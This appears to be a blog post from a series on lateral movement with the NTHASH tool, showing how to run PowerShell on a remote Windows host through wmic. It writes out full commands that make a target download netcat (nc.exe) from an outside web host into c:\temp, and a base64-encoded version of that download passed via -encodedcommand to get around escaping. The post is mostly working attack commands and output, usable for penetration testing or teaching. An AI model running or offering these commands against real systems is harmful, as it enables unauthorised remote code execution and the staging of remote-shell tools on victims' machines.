lets again introduce a variant of previous article.
Ideally we would be using the windows built in wmic command rather that the nthash runwmi verb.
Unfortunately, wmic can be a pita with escaping characters in some situations, especially when combining with powershell.
The below for instance wont work because of the ‘,’ comma character.
wmic /node:target process call create « powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘https://erwan.labalec.fr/uploads/nc.exe’,’c:\temp\nc.exe’) »
The trick/workaround is to base64encode (unicode) the powershell command.
NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);
Which will give you the following :
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ
BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=
You can then execute a powershell command on a remote target using wmic like below :
wmic /node:target process call create « powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA= »
One Response to “Demonstrating lateral movement with NTHASH Part #4”
Leave a Reply
Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.
[…] previous article, we have introduced the used of WMIC in a « pass the hash » […]